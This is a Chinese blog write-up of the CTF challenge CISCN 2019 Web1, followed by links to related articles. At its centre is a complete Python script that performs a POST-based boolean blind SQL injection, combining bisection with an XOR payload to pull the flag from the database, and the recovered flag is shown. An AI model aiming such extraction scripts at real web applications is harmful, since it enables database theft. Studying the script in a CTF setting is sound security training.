SQL注入(盲注——二分法POST)

已于 2023-09-07 09:13:59 修改
阅读量421 收藏
点赞数
分类专栏: CTF # sql注入 文章标签: sql 数据库 网络安全
于 2023-09-07 09:12:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43520778/article/details/132729777
版权

@[toc]SQL注入

[CISCN 2019华北Day2]Web1

题目

在这里插入图片描述

解题分析

测试SQL注入点和回显结构
输入1
在这里插入图片描述

输入1’,1’#,1’%23等测试均回显

在这里插入图片描述
可以尝试SQL盲注

题解

提示:因为是表单,故采用POST二分法

import requests
import time

url = "http://node4.anna.nssctf.cn:28573/index.php"
flag = ''

if __name__ == "__main__":

    for i in range(1, 100):
        min = 33
        max = 130
        mid = int((max - min) / 2)
        while True:
            payload = {
                'id': '0^' + '(ascii(substr((select(flag)from(flag)),{},1))>{})'.format(i, mid)
            }
            #print(payload)
            res = requests.post(url=url, data=payload).text
            time.sleep(0.005)
            #print(res)
            if 'Hello' in res:
                min = mid
                mid = int((max + min) / 2)
            else:
                max = mid
                mid = int((max + min) / 2)
            #print("此时的最大值为{}, 最小值为{}, 中间值为{}".format(maxa,mina,mid))
            if (max-min) <= 1:
                flag += chr(max)
                print(flag)
                break
        if '}' in flag:
            break

执行得到flag

NSSCTF{d5343df9-bb92-44e2-8b88-c10a8e0cd6f7}
L'amour d'une vie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL SERVER 分页查询二分法
07-02
通常多表联查并且数据大时,分页查询时,会出现查询性能问题,查分页后面的数据,时间越久。但我们可以通过判断查询数据的总数据来进行相应的查询方式,从而保证性能。
二分法实现SQL盲注
小菜猴子_x
09-12 1077
因为在buu上做题,然后无奈研究二分法实现SQL盲注
sql盲注二分法注入脚本
菜鸟-传奇
12-27 1028
sql盲注二分法注入脚本 次脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
[SQL盲注][极客大挑战 2019]FinalSQL(二分法)
Y4tacker的博客
08-16 6136
发现过滤了一堆比如*空格之类的我们用()绕过上脚本, 网站太垃圾了请求的快,就要出错,还要加一个sleep等一下 import time import requests url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id=" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while h
二分法盲注
qq_43756333的博客
05-25 2854
在学sql盲注脚本的时候碰到了使用二分法盲注字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用注入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或注入,有关异或注入的原理,可参考异或注入 直接给出payload:1^(if((ascii(substr((select
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法SQL盲注中的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,...
java算法——二分法查找
07-15
二分法查找 *进行二分法查找的前提是数组已有序 *查找范围的上下界
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
网络安全原理与应用:SQL盲注.pptx
05-16
与传统的SQL注入不同,盲注并不直接显示注入语句的执行结果,而是依赖于应用程序的响应时间或输出状态来推断信息。这使得攻击过程更加复杂,需要更多的技巧和耐心。 1. **基于布尔的盲注** 布尔盲注依赖于查询结果...
非线性方程求根——二分法python
12-08
对于区间[a,b]上连续不断且f(a)·f(b)的函数y=f(x),通过不断地把函数f(x)的零点所在的区间一分为二,使区间的两个端点逐步逼近零点,进而得到零点近似值的方法叫二分法。 算法:当数据量很大适宜采用该...
pl/sql二分法
magicbluestone的专栏
03-02 662
<br />create or replace procedure pr_half_find(in_num in number,in_arr in varchar2)<br />is<br />type arr_num is table of number index by binary_integer;<br />my_arr_num arr_num;<br />n_arr_index number(10):=0;<br />n_upper_bound number(10);<br />n_lower_b
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1348
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
最新发布
RexHa的博客
11-18 1766
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
SQL盲注脚本
ma963852的博客
12-14 851
#coding:utf-8 import requests import time ip_port="127.0.0.1:80" data={ "login":"bee", "password":"bug", "security_level":"0", "form":"submit" } urlLogin="http://%s/login.php"%ip_port session=requests.session() resp=session.post(urlLogin,.
二分查找结合sql盲注
whojoe的博客
04-14 895
二分查找结合sql盲注回顾分析网上的代码找学算法的同学帮忙大佬真强算法优化后算法优化前验证效果数据表结构优化前耗时优化后耗时 回顾 昨天晚上写了一个sql盲注的脚本,对数据是采用的枚举方法,简单跑了一下发现非常的慢,于是上网去找了一下别人的代码。 分析 网上的代码 def get_Current_DbName(self): table_list = [] #二分法获...
sql盲注脚本
since_2020的博客
08-14 210
盲注脚本 POST型 from time import sleep import requests s = requests.Session() url = '******' flag = '' class Solution: # 数据库名 def function_database(self,left_num, compare_str_num): payload = f"/**/or/**/ord(right(left((database()),{left_num}
SQL注入(二)之注入分类
不秃头的程序Yang
03-21 178
一 前期准备 01 查询IP 02 启动phpstudy 03 访问网站 二 数字型注入
二分法学习
quan9i的博客
03-18 612
文章目录前言定义详细过程示例 前言 文章同步于我的个人博客 由于学习sql注入时看了部分师傅的脚本,涉及到二分法,才发现自己对二分法的所知甚少,因此来对二分法进行学习,希望能对正在学习二分法的人有所帮助。 定义 ​ 二分法(Bisection method),即一分为二的的方法。对于在区间[a,b]上连续不断且满足f(a)*f(b)<0 的函数y=f(x),通过不断地把函数f(x)的零点所在区间二等分,使区间两个端点逐步逼近零点,进而得到 零点的近似值的方法。 小白理解,设置极小值与极大值,然后不断
mysql盲注二分法脚本
zh_cn1的博客
08-12 432
PS 闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本 #正常页面的大小 def resLen(url): res=requests.get(url) return len(res.text) #当前数据库长度 def currdb_len(url): payload="1' and length(database())=" for i in range(1,100): if resLen(url+payload+str(i
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值